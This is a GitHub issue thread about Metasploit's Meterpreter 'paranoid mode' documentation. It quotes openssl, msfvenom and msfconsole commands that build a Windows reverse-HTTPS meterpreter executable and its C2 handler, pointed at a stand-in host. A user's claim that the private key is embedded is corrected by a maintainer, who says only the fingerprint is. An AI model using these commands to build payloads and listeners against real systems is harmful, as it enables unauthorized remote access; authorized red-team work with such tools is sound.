Metasploit-framework: Bad instructions for paranoid mode
https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode has instructions:
$ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \
-keyout www.example.com.key \
-out www.example.com.crt && \
cat www.example.com.key www.example.com.crt > www.example.com.pem && \
rm -f www.example.com.key www.example.com.crt
$ ./msfvenom -p windows/meterpreter_reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedStageless -f exe -o launch-paranoid-stageless.exe
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'
That makes no sense. It embeds not only the cert, but also the private key, in the payload. As soon as the blue team finds one copy of the payload anywhere, the blue team gets the key, and gains the ability to impersonate the red team's C2 server and capture all the other running copies of the payload.
ostby
All 2 comments
It embeds not only the cert, but also the private key, in the payload.
Nope, sorry, not even close. No keys are embedded in the payload, at all. The only thing that's embedded is the SHA1 fingerprint.
OJ
on 3 Jul 2018
Oops, sorry, I was deceived by the symmetric commands. I.e. HandlerSSLCert for both msfvenom and msfconsole with the full pem file (containing the key) passed as an argument for both.
ostby
on 3 Jul 2018
Related issues
bcoles
路
3Comments
fluit105
路
3Comments
wvu-r7
路
3Comments
felipee07
路
3Comments
Acidical
路
3Comments
Most helpful comment
Oops, sorry, I was deceived by the symmetric commands. I.e. HandlerSSLCert for both msfvenom and msfconsole with the full pem file (containing the key) passed as an argument for both.